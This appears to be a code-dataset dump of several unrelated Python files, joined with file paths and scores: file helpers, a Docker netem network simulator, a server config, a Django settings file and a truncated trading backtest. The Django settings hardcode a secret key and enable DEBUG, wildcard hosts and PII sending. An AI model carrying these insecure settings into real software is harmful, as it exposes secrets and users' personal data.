# Lecture du fichier de configuration
def ChargeFic(self, c_fic, c_dir):
try:
file = open(os.path.join(c_dir, c_fic))
result = file.read()
file.close()
return result
except OSError:
# print(e, file=sys.stderr)
err = "Fichier non trouvé"
print("\n")
print("Impossible de Lire le Fichier ({}), le script se termine.".format(err))
print("\n")
# sys.exit(1)
except Exception as ex:
print(ex)
print("Impossible de continuer (%s), le script se termine.")
# TODO: A ajouter un raise
quit()
def CreerRep(self, c_dir):
"""Creation du repertoire output directory si manquant.
a voir :
Path('/my/directory').mkdir(mode=0o777, parents=True, exist_ok=True)
This recursively creates the directory and does not raise an exception if the directory already exists.
"""
if not os.path.exists(c_dir):
os.mkdir(c_dir)
def EcritFic(self, c_fic, c_dir="", c_Content="", c_mode='w'):
"""Ecrit c_Content dans un fichier."""
if c_Content:
f = open(os.path.join(c_dir, c_fic), c_mode)
f.write(c_Content)
f.close()
def CopyFic(self, c_fic, c_ficdest):
"""Copie un fichier vers un autre."""
new_file = shutil.copy(c_fic, c_ficdest, follow_symlinks=False)
if new_file == c_ficdest:
return True
def MoveFic(self, c_fic, c_dest):
"""Move un fichier vers un autre fichier ou un répertoire."""
shutil.move(c_fic, c_dest, copy_function='copy2')
def EffaceFic(self, c_fic):
"""Effacer un Fichier."""
file_path = Path(c_fic)
file_path.unlink()
def getListRep(self, c_dir='.'):
"""Retourne la liste des répertoires présent dans c_dir."""
p = Path(c_dir)
tmp = [x for x in p.iterdir() if x.is_dir()]
cc = list()
for bcl in tmp:
cc.append(os.fspath(bcl))
return cc
def getListFile(self, c_dir='.', c_filtre='*.py'):
"""Retourne la liste des Fichiers présent dans c_dir.
Parameters
----------
c_dir : str
Le nom du répertoire source
c_filtre : str
Le filtre à appliquer
Raises
------
BaseException
Si le fqdn est incorrect, on retourne None
Returns
-------
list
une liste de strings : Nom de Fichiers
"""
p = Path(c_dir)
cc = list()
curList = list(p.glob(c_filtre))
for bcl in curList:
if bcl.is_file():
cc.append(os.fspath(bcl))
return cc | 0.310172 | 0.274991 |
import os
import subprocess
networks = {}
class Network(object):
def __init__(self, key, networkName):
self.key = key
self.networkName = networkName
self.connectedContainer = {}
self.netemInitialized = {}
def isNetemInitialized(self, container):
return self.netemInitialized[container]
def setNetemInitialized(self, container, newValue):
self.netemInitialized[container] = newValue
def getNetworkName(self):
return self.networkName
def connect(self, containerName, interfaceName):
self.netemInitialized[containerName] = False
self.connectedContainer[containerName] = interfaceName
def disconnect(self, containerName):
self.connectedContainer.pop(containerName, None)
def getConnectedContainer(self):
return self.connectedContainer.keys()
def getInterfaceNameOfConnectedContainer(self, containerName):
return self.connectedContainer[containerName]
def printNetwork(self):
print "Network: " + self.key
print "Network-Name: " + self.networkName
print "Connected: "
for container in self.connectedContainer:
print container+" : "+self.connectedContainer[container]
def join(actionObject, dockerComposeProjectName):
containerList = actionObject["container"]
internal = False
if "internal" in actionObject:
internal = actionObject["internal"]
mode = "cluster"
if "mode" in actionObject:
mode = actionObject["mode"]
exitCode = 0
if mode == "cluster":
exitCode = connect(containerList, dockerComposeProjectName, internal)
elif mode == "row" or mode == "ring":
for i in range(0, len(containerList)-1):
exitCode = max(connect(containerList[i:i+2], dockerComposeProjectName, internal), exitCode)
# Close the ring
if mode == "ring":
exitCode = max(connect([containerList[0], containerList[len(containerList)-1]], dockerComposeProjectName, internal), exitCode)
return exitCode
def cut(actionObject, dockerComposeProjectName):
containerList = actionObject["container"]
return disconnect(containerList, dockerComposeProjectName)
def deleteAllNetworks():
exitCode = -1
for key in networks:
networkName = networks[key].getNetworkName()
exitCode = max(deleteNetwork(networkName), exitCode)
return exitCode
def delay(actionObject, dockerComposeProjectName):
time = actionObject["time"]
if time is None:
print "You have to set a time"
return 1
arguments = [time]
if "jitter" in actionObject:
arguments = arguments+[actionObject["jitter"]]
if "correlation" in actionObject:
arguments = arguments+[actionObject["correlation"]]
if "distribution" in actionObject:
arguments = arguments+["distribution", actionObject["distribution"]]
return executeNetemCommandsForNetwork(actionObject, dockerComposeProjectName, "delay", arguments)
def duplicate(actionObject, dockerComposeProjectName):
percent = actionObject["percent"]
arguments = [str(percent)+"%"]
if "correlation" in actionObject:
arguments = arguments+[actionObject["correlation"]]
return executeNetemCommandsForNetwork(actionObject, dockerComposeProjectName, "duplicate", arguments)
def corrupt(actionObject, dockerComposeProjectName):
percent = actionObject["percent"]
arguments = [str(percent)+"%"]
if "correlation" in actionObject:
arguments = arguments+[actionObject["correlation"]]
return executeNetemCommandsForNetwork(actionObject, dockerComposeProjectName, "corrupt", arguments)
def loss(actionObject, dockerComposeProjectName):
percent = actionObject["percent"]
arguments = [str(percent)+"%"]
if "correlation" in actionObject:
arguments = arguments+[actionObject["correlation"]]
return executeNetemCommandsForNetwork(actionObject, dockerComposeProjectName, "loss", arguments)
def connect(containerList, dockerComposeProjectName, internal):
containerList = convertToContainerNames(containerList, dockerComposeProjectName)
print "connect "+str(containerList)
mapKey = getMapKey(containerList)
if mapKey in networks:
print "These containers are already connected"
return 1
# get network name
networkName = createNetwork(internal)
if networkName == None:
print "Could not create network"
return 1
networks[mapKey] = Network(mapKey, networkName)
exitCode = -1
for container in containerList:
subprocess.call(["docker", "network", "disconnect", "none", container], stdout=open(os.devnull, "w"), stderr=subprocess.STDOUT)
preNetworkInterfaces = getNetworkInterfaces(container)
localExitCode = subprocess.call(["docker", "network", "connect", networkName, container])
postNetworkInterfaces = getNetworkInterfaces(container)
interfaceName = None
for networkInterface in postNetworkInterfaces:
if networkInterface not in preNetworkInterfaces:
interfaceName = networkInterface
if localExitCode == 0 and interfaceName is not None:
networks[mapKey].connect(container, interfaceName)
exitCode = max(exitCode, localExitCode)
if exitCode != 0:
print "Could not connect all containers to the network"
return exitCode
def disconnect(containerList, dockerComposeProjectName):
containerList = convertToContainerNames(containerList, dockerComposeProjectName)
print "disconnect "+str(containerList)
mapKey = getMapKey(containerList)
if mapKey not in networks:
print "This network does not exists"
return 1
network = networks[mapKey]
exitCode = -1
for container in containerList:
localExitCode = subprocess.call(["docker", "network", "disconnect", network.getNetworkName(), container])
if localExitCode == 0:
network.disconnect(container)
exitCode = max(exitCode, localExitCode)
if exitCode != 0:
print "Could not disconnect all containers from the network"
return 1
exitCode = deleteNetwork(network.getNetworkName())
if exitCode != 0:
print "Cloud not delete the network"
else:
networks.pop(mapKey, None)
return exitCode
def createNetwork(internal):
i = 0
networkPrefix = "network-simulator-network_"
exitCode = 0
# Returns 0 if network exists
while subprocess.call(["docker", "network", "inspect", networkPrefix+str(i)], stdout=open(os.devnull, "w"), stderr=subprocess.STDOUT) == 0:
i += 1
if internal:
exitCode = subprocess.call(["docker", "network", "create", "--internal", networkPrefix+str(i)])
else:
exitCode = subprocess.call(["docker", "network", "create", networkPrefix+str(i)])
if exitCode == 0:
return networkPrefix+str(i)
return None
def deleteNetwork(networkName):
return subprocess.call(["docker", "network", "rm", networkName])
def getNetworkInterfaces(containerName):
proc = subprocess.Popen(["docker", "exec", containerName, "ls", "/sys/class/net"], stdout=subprocess.PIPE)
return proc.stdout.read().split()
def convertToContainerNames(containerList, dockerComposeProjectName):
newList = list()
for container in containerList:
newList.append(dockerComposeProjectName + "_" + container + "_1")
return newList
def getMapKey(containerList):
result = ""
for container in sorted(containerList):
result = result + container + ";"
return result
def executeNetemCommandsForNetwork(actionObject, dockerComposeProjectName, command, arguments):
networkList = convertToContainerNames(actionObject["network"], dockerComposeProjectName)
networkKey = getMapKey(networkList)
network = networks[networkKey]
exitCode = -1
for container in network.getConnectedContainer():
localExitCode = executeNetemCommand(network, container, command, arguments)
if localExitCode == 0:
network.setNetemInitialized(container, True)
exitCode = max(localExitCode, exitCode)
return exitCode
def executeNetemCommand(network, containerName, command, arguments):
interface = network.getInterfaceNameOfConnectedContainer(containerName)
netemMode = None
if not network.isNetemInitialized(containerName):
netemMode = "add"
else:
netemMode = "change"
return subprocess.call(["docker", "exec", containerName, "tc", "qdisc", netemMode, "dev", interface, "root", "netem", command] + arguments) | docker-network-simulator/actions/networkActions.py | import os
import subprocess
networks = {}
class Network(object):
def __init__(self, key, networkName):
self.key = key
self.networkName = networkName
self.connectedContainer = {}
self.netemInitialized = {}
def isNetemInitialized(self, container):
return self.netemInitialized[container]
def setNetemInitialized(self, container, newValue):
self.netemInitialized[container] = newValue
def getNetworkName(self):
return self.networkName
def connect(self, containerName, interfaceName):
self.netemInitialized[containerName] = False
self.connectedContainer[containerName] = interfaceName
def disconnect(self, containerName):
self.connectedContainer.pop(containerName, None)
def getConnectedContainer(self):
return self.connectedContainer.keys()
def getInterfaceNameOfConnectedContainer(self, containerName):
return self.connectedContainer[containerName]
def printNetwork(self):
print "Network: " + self.key
print "Network-Name: " + self.networkName
print "Connected: "
for container in self.connectedContainer:
print container+" : "+self.connectedContainer[container]
def join(actionObject, dockerComposeProjectName):
containerList = actionObject["container"]
internal = False
if "internal" in actionObject:
internal = actionObject["internal"]
mode = "cluster"
if "mode" in actionObject:
mode = actionObject["mode"]
exitCode = 0
if mode == "cluster":
exitCode = connect(containerList, dockerComposeProjectName, internal)
elif mode == "row" or mode == "ring":
for i in range(0, len(containerList)-1):
exitCode = max(connect(containerList[i:i+2], dockerComposeProjectName, internal), exitCode)
# Close the ring
if mode == "ring":
exitCode = max(connect([containerList[0], containerList[len(containerList)-1]], dockerComposeProjectName, internal), exitCode)
return exitCode
def cut(actionObject, dockerComposeProjectName):
containerList = actionObject["container"]
return disconnect(containerList, dockerComposeProjectName)
def deleteAllNetworks():
exitCode = -1
for key in networks:
networkName = networks[key].getNetworkName()
exitCode = max(deleteNetwork(networkName), exitCode)
return exitCode
def delay(actionObject, dockerComposeProjectName):
time = actionObject["time"]
if time is None:
print "You have to set a time"
return 1
arguments = [time]
if "jitter" in actionObject:
arguments = arguments+[actionObject["jitter"]]
if "correlation" in actionObject:
arguments = arguments+[actionObject["correlation"]]
if "distribution" in actionObject:
arguments = arguments+["distribution", actionObject["distribution"]]
return executeNetemCommandsForNetwork(actionObject, dockerComposeProjectName, "delay", arguments)
def duplicate(actionObject, dockerComposeProjectName):
percent = actionObject["percent"]
arguments = [str(percent)+"%"]
if "correlation" in actionObject:
arguments = arguments+[actionObject["correlation"]]
return executeNetemCommandsForNetwork(actionObject, dockerComposeProjectName, "duplicate", arguments)
def corrupt(actionObject, dockerComposeProjectName):
percent = actionObject["percent"]
arguments = [str(percent)+"%"]
if "correlation" in actionObject:
arguments = arguments+[actionObject["correlation"]]
return executeNetemCommandsForNetwork(actionObject, dockerComposeProjectName, "corrupt", arguments)
def loss(actionObject, dockerComposeProjectName):
percent = actionObject["percent"]
arguments = [str(percent)+"%"]
if "correlation" in actionObject:
arguments = arguments+[actionObject["correlation"]]
return executeNetemCommandsForNetwork(actionObject, dockerComposeProjectName, "loss", arguments)
def connect(containerList, dockerComposeProjectName, internal):
containerList = convertToContainerNames(containerList, dockerComposeProjectName)
print "connect "+str(containerList)
mapKey = getMapKey(containerList)
if mapKey in networks:
print "These containers are already connected"
return 1
# get network name
networkName = createNetwork(internal)
if networkName == None:
print "Could not create network"
return 1
networks[mapKey] = Network(mapKey, networkName)
exitCode = -1
for container in containerList:
subprocess.call(["docker", "network", "disconnect", "none", container], stdout=open(os.devnull, "w"), stderr=subprocess.STDOUT)
preNetworkInterfaces = getNetworkInterfaces(container)
localExitCode = subprocess.call(["docker", "network", "connect", networkName, container])
postNetworkInterfaces = getNetworkInterfaces(container)
interfaceName = None
for networkInterface in postNetworkInterfaces:
if networkInterface not in preNetworkInterfaces:
interfaceName = networkInterface
if localExitCode == 0 and interfaceName is not None:
networks[mapKey].connect(container, interfaceName)
exitCode = max(exitCode, localExitCode)
if exitCode != 0:
print "Could not connect all containers to the network"
return exitCode
def disconnect(containerList, dockerComposeProjectName):
containerList = convertToContainerNames(containerList, dockerComposeProjectName)
print "disconnect "+str(containerList)
mapKey = getMapKey(containerList)
if mapKey not in networks:
print "This network does not exists"
return 1
network = networks[mapKey]
exitCode = -1
for container in containerList:
localExitCode = subprocess.call(["docker", "network", "disconnect", network.getNetworkName(), container])
if localExitCode == 0:
network.disconnect(container)
exitCode = max(exitCode, localExitCode)
if exitCode != 0:
print "Could not disconnect all containers from the network"
return 1
exitCode = deleteNetwork(network.getNetworkName())
if exitCode != 0:
print "Cloud not delete the network"
else:
networks.pop(mapKey, None)
return exitCode
def createNetwork(internal):
i = 0
networkPrefix = "network-simulator-network_"
exitCode = 0
# Returns 0 if network exists
while subprocess.call(["docker", "network", "inspect", networkPrefix+str(i)], stdout=open(os.devnull, "w"), stderr=subprocess.STDOUT) == 0:
i += 1
if internal:
exitCode = subprocess.call(["docker", "network", "create", "--internal", networkPrefix+str(i)])
else:
exitCode = subprocess.call(["docker", "network", "create", networkPrefix+str(i)])
if exitCode == 0:
return networkPrefix+str(i)
return None
def deleteNetwork(networkName):
return subprocess.call(["docker", "network", "rm", networkName])
def getNetworkInterfaces(containerName):
proc = subprocess.Popen(["docker", "exec", containerName, "ls", "/sys/class/net"], stdout=subprocess.PIPE)
return proc.stdout.read().split()
def convertToContainerNames(containerList, dockerComposeProjectName):
newList = list()
for container in containerList:
newList.append(dockerComposeProjectName + "_" + container + "_1")
return newList
def getMapKey(containerList):
result = ""
for container in sorted(containerList):
result = result + container + ";"
return result
def executeNetemCommandsForNetwork(actionObject, dockerComposeProjectName, command, arguments):
networkList = convertToContainerNames(actionObject["network"], dockerComposeProjectName)
networkKey = getMapKey(networkList)
network = networks[networkKey]
exitCode = -1
for container in network.getConnectedContainer():
localExitCode = executeNetemCommand(network, container, command, arguments)
if localExitCode == 0:
network.setNetemInitialized(container, True)
exitCode = max(localExitCode, exitCode)
return exitCode
def executeNetemCommand(network, containerName, command, arguments):
interface = network.getInterfaceNameOfConnectedContainer(containerName)
netemMode = None
if not network.isNetemInitialized(containerName):
netemMode = "add"
else:
netemMode = "change"
return subprocess.call(["docker", "exec", containerName, "tc", "qdisc", netemMode, "dev", interface, "root", "netem", command] + arguments) | 0.243373 | 0.122576 |
# The network address to bind the server socket to
# Use "localhost" to restrict access from the local machine.
SERVER_ADDRESS = ""
# The TCP port to listen to
SERVER_PORT = 9099
# The base path for the API. Do not forget the trailing "/"!
# This the path that the front-end web server will redirect request to this back-end.
BASE_PATH = "/data/"
# Path map to modules and their configuration.
# Available modules are:
# - coll: The following item is available:
# - usetex: Boolean to indicate whether to use LaTeX for text formatting
# - sph: The following item is available:
# - dir: Directory where both the configuration file and data files are present.
# - file: Name of a YAML containing the definitions
# - items: Direct definitions (only if "file" is not set or points to an non-existing file)
# Definitions are given as a dictionary, where the key are the identifiers and the value another dictionary of three items:
# - file: Path to HDF5 file containing the data
# - desc: Human-reable description of the dataset
# - fields: Array of fields to retrieve from the file and send to the caller. Each item here is dictionary with the following keys:
# - data: Expression to compute the values; it is a mathematical expression parsed by MaExPa with the fields in the dataset available as variables
# - value: Human-readable description of the field
# - unit: Human-readable description of the unit of the data
# - short: Short name of the field; optional, if not set, the "value" key will be used instead
# - db: The following item is available:
# - dir: Directory where both the configuration file and data files are present.
# - file: Name of a YAML containing the definitions
# - items: Direct definitions (only if "file" is not set or points to an non-existing file)
# Definitions are given as a dictionary, where the key are the identifiers and the value another dictionary with the following items:
# - file: Path to HDF5 file containing the data
# - desc: Human-reable description of the dataset
# - base_fields: List of fields available for the entire set; each entry is a dictionary with the following keys:
# - name: Field name as it should appear on the resulting data
# - data: Expression to compute the values; it is a mathematical expression parsed by MaExPa with the fields in the dataset available as variables
# - desc: Human-reable description of the field
# - format: Formatting information for the caller
# - fields: Fields to return for each entry in the database
# - name: Field name as it should appear on the resulting data
# - data: Expression to compute the values; it is a mathematical expression parsed by MaExPa with the fields in the dataset available as variables
# - plot: Plotting information. Passed as-is to the output
MODS = {
"coll": ( "coll", {
"usetex": False,
} ),
}
# List of origins from which to allow cross-domain requests.
# This is useful during development when this server is not at the same address as the one providing the user interface.
CORS_ORIGINS = [] | hcds_config.py |
# The network address to bind the server socket to
# Use "localhost" to restrict access from the local machine.
SERVER_ADDRESS = ""
# The TCP port to listen to
SERVER_PORT = 9099
# The base path for the API. Do not forget the trailing "/"!
# This the path that the front-end web server will redirect request to this back-end.
BASE_PATH = "/data/"
# Path map to modules and their configuration.
# Available modules are:
# - coll: The following item is available:
# - usetex: Boolean to indicate whether to use LaTeX for text formatting
# - sph: The following item is available:
# - dir: Directory where both the configuration file and data files are present.
# - file: Name of a YAML containing the definitions
# - items: Direct definitions (only if "file" is not set or points to an non-existing file)
# Definitions are given as a dictionary, where the key are the identifiers and the value another dictionary of three items:
# - file: Path to HDF5 file containing the data
# - desc: Human-reable description of the dataset
# - fields: Array of fields to retrieve from the file and send to the caller. Each item here is dictionary with the following keys:
# - data: Expression to compute the values; it is a mathematical expression parsed by MaExPa with the fields in the dataset available as variables
# - value: Human-readable description of the field
# - unit: Human-readable description of the unit of the data
# - short: Short name of the field; optional, if not set, the "value" key will be used instead
# - db: The following item is available:
# - dir: Directory where both the configuration file and data files are present.
# - file: Name of a YAML containing the definitions
# - items: Direct definitions (only if "file" is not set or points to an non-existing file)
# Definitions are given as a dictionary, where the key are the identifiers and the value another dictionary with the following items:
# - file: Path to HDF5 file containing the data
# - desc: Human-reable description of the dataset
# - base_fields: List of fields available for the entire set; each entry is a dictionary with the following keys:
# - name: Field name as it should appear on the resulting data
# - data: Expression to compute the values; it is a mathematical expression parsed by MaExPa with the fields in the dataset available as variables
# - desc: Human-reable description of the field
# - format: Formatting information for the caller
# - fields: Fields to return for each entry in the database
# - name: Field name as it should appear on the resulting data
# - data: Expression to compute the values; it is a mathematical expression parsed by MaExPa with the fields in the dataset available as variables
# - plot: Plotting information. Passed as-is to the output
MODS = {
"coll": ( "coll", {
"usetex": False,
} ),
}
# List of origins from which to allow cross-domain requests.
# This is useful during development when this server is not at the same address as the one providing the user interface.
CORS_ORIGINS = [] | 0.722135 | 0.547525 |
from pathlib import Path
import cloudinary
import cloudinary.uploader
import cloudinary.api
from dotenv import load_dotenv
import dj_database_url
import sentry_sdk
from sentry_sdk.integrations.django import DjangoIntegration
import os
load_dotenv()
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
sentry_sdk.init(
dsn=os.environ.get('SENTRY'),
integrations=[DjangoIntegration()],
# Set traces_sample_rate to 1.0 to capture 100%
# of transactions for performance monitoring.
# We recommend adjusting this value in production.
traces_sample_rate=1.0,
# If you wish to associate users to errors (assuming you are using
# django.contrib.auth) you may enable sending PII data.
send_default_pii=True
)
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'django-insecure-&%*y&g^emd56xe_ul5c2u0$8_v%i@g57p5kglmk9#3n2t98p*k'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = ['*']
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'Vendor.apps.VendorConfig',
'crispy_forms',
'django_filters',
'cloudinary',
]
CRISPY_TEMPLATE_PACK = 'bootstrap4'
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'whitenoise.middleware.WhiteNoiseMiddleware',
]
ROOT_URLCONF = 'UltronCRM.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [BASE_DIR /"templates"],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'UltronCRM.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
}
db_from_env = dj_database_url.config(conn_max_age=600)
DATABASES['default'].update(db_from_env)
# Password validation
# https://docs.djangoproject.com/en/3.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.2/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, 'staticfiles')
STATICFILES_DIRS = (
os.path.join(BASE_DIR, 'static'),
)
# Default primary key field type
# https:/
# /docs.djangoproject.com/en/3.2/ref/settings/#default-auto-field
DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'
AUTHENTICATION_BACKENDS = ['django.contrib.auth.backends.ModelBackend']
# cloudinary config
cloudinary.config(
cloud_name = os.environ.get('CLOUD'),
api_key = os.environ.get('API_KEY'),
api_secret = os.environ.get('SECRET')
)
# EMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'
# EMAIL_FILE_PATH = str(BASE_DIR.joinpath('sent_emails'))
# EMAIL_HOST = 'smtp.gmail.com'
# EMAIL_USE_TLS = True
# EMAIL_PORT = 587
# EMAIL_HOST_USER = os.environ.get('EMAIL_HOST_USER')
# EMAIL_HOST_PASSWORD = os.environ.get('EMAIL_HOST_PASSWORD') | UltronCRM/settings.py | from pathlib import Path
import cloudinary
import cloudinary.uploader
import cloudinary.api
from dotenv import load_dotenv
import dj_database_url
import sentry_sdk
from sentry_sdk.integrations.django import DjangoIntegration
import os
load_dotenv()
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
sentry_sdk.init(
dsn=os.environ.get('SENTRY'),
integrations=[DjangoIntegration()],
# Set traces_sample_rate to 1.0 to capture 100%
# of transactions for performance monitoring.
# We recommend adjusting this value in production.
traces_sample_rate=1.0,
# If you wish to associate users to errors (assuming you are using
# django.contrib.auth) you may enable sending PII data.
send_default_pii=True
)
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'django-insecure-&%*y&g^emd56xe_ul5c2u0$8_v%i@g57p5kglmk9#3n2t98p*k'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = ['*']
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'Vendor.apps.VendorConfig',
'crispy_forms',
'django_filters',
'cloudinary',
]
CRISPY_TEMPLATE_PACK = 'bootstrap4'
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'whitenoise.middleware.WhiteNoiseMiddleware',
]
ROOT_URLCONF = 'UltronCRM.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [BASE_DIR /"templates"],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'UltronCRM.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
}
db_from_env = dj_database_url.config(conn_max_age=600)
DATABASES['default'].update(db_from_env)
# Password validation
# https://docs.djangoproject.com/en/3.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.2/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, 'staticfiles')
STATICFILES_DIRS = (
os.path.join(BASE_DIR, 'static'),
)
# Default primary key field type
# https:/
# /docs.djangoproject.com/en/3.2/ref/settings/#default-auto-field
DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'
AUTHENTICATION_BACKENDS = ['django.contrib.auth.backends.ModelBackend']
# cloudinary config
cloudinary.config(
cloud_name = os.environ.get('CLOUD'),
api_key = os.environ.get('API_KEY'),
api_secret = os.environ.get('SECRET')
)
# EMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'
# EMAIL_FILE_PATH = str(BASE_DIR.joinpath('sent_emails'))
# EMAIL_HOST = 'smtp.gmail.com'
# EMAIL_USE_TLS = True
# EMAIL_PORT = 587
# EMAIL_HOST_USER = os.environ.get('EMAIL_HOST_USER')
# EMAIL_HOST_PASSWORD = os.environ.get('EMAIL_HOST_PASSWORD') | 0.470737 | 0.062847 |
import os
import sys
sys.path.append(os.getcwd())
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from src.DataReader import *
from src.Visualiser import *
from src.Trader import *
from test.MCS import *
reader = DataReader("./resources/DAT_XLSX_USDZAR_M1_2019.csv")
# reader = DataReader("./resources/SPY.csv")
# reader = DataReader("./resources/gemini_BTCUSD_1hr.csv")
indicators = pd.DataFrame()
mac = MovingAverageCrossover(reader.data["Close"], 10, 30)
# bbs = BollingerBand(reader.data["Close"], 90, 1)
# rsi = RelativeStrengthIndex(reader.data["Close"], 20)
# mom = Momentum(reader.data["Close"], 150)
idtf = IntradayTimeFilter("00:00", "00:00")
slp = 0.3*100
tlp = 0.8*100
tpp = 1.5*100
print("** Starting Trader ***")
trader = Trader(reader.data, starting_capital=1000, trading_mechanism=mac, intraday_time_filter=idtf,
stop_loss_percent=slp, trailing_loss_percent=tlp, take_profit_percent=tpp)
output_title = f"../nmrqltrading_results/results/{trader.trading_mechanism.fast_length}_{trader.trading_mechanism.slow_length}_{trader.stop_loss_percent}_{trader.trailing_loss_percent}_{trader.take_profit_percent}"
os.makedirs(output_title, exist_ok=True)
print("** Processing trades **")
tr = process_trade_results(trader)
f = open(f"{output_title}/trade_results.txt", 'w')
f.write(tr)
f.flush()
f.close()
print("** Running MCS **")
mcs = MCS(trader, 3)
print("** Plotting Trades Made **")
plot_made_trades(trader)
plt.savefig(f"{output_title}/made_trades.png")
plt.close()
print("** Plotting Equity Curve **")
plot_equity(trader)
plt.savefig(f"{output_title}/equity_curve.png")
plt.close()
print("** Plotting Drawdown Curve **")
plot_drawdown(trader)
plt.savefig(f"{output_title}/drawdown_curve.png")
plt.close()
print("** Plotting MCS **")
plot_monte_carlo(mcs)
plt.savefig(f"{output_title}/mcs.png")
plt.close()
print("** Plotting MAE **")
plot_mae(trader)
plt.savefig(f"{output_title}/mae.png")
plt.close()
print("** Plotting MFE **")
plot_mfe(trader)
plt.savefig(f"{output_title}/mfe.png")
plt.close()
print("** Plots completed **") | main.py | import os
import sys
sys.path.append(os.getcwd())
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from src.DataReader import *
from src.Visualiser import *
from src.Trader import *
from test.MCS import *
reader = DataReader("./resources/DAT_XLSX_USDZAR_M1_2019.csv")
# reader = DataReader("./resources/SPY.csv")
# reader = DataReader("./resources/gemini_BTCUSD_1hr.csv")
indicators = pd.DataFrame()
mac = MovingAverageCrossover(reader.data["Close"], 10, 30)
# bbs = BollingerBand(reader.data["Close"], 90, 1)
# rsi = RelativeStrengthIndex(reader.data["Close"], 20)
# mom = Momentum(reader.data["Close"], 150)
idtf = IntradayTimeFilter("00:00", "00:00")
slp = 0.3*100
tlp = 0.8*100
tpp = 1.5*100
print("** Starting Trader ***")
trader = Trader(reader.data, starting_capital=1000, trading_mechanism=mac, intraday_time_filter=idtf,
stop_loss_percent=slp, trailing_loss_percent=tlp, take_profit_percent=tpp)
output_title = f"../nmrqltrading_results/results/{trader.trading_mechanism.fast_length}_{trader.trading_mechanism.slow_length}_{trader.stop_loss_percent}_{trader.trailing_loss_percent}_{trader.take_profit_percent}"
os.makedirs(output_title, exist_ok=True)
print("** Processing trades **")
tr = process_trade_results(trader)
f = open(f"{output_title}/trade_results.txt", 'w')
f.write(tr)
f.flush()
f.close()
print("** Running MCS **")
mcs = MCS(trader, 3)
print("** Plotting Trades Made **")
plot_made_trades(trader)
plt.savefig(f"{output_title}/made_trades.png")
plt.close()
print("** Plotting Equity Curve **")
plot_equity(trader)
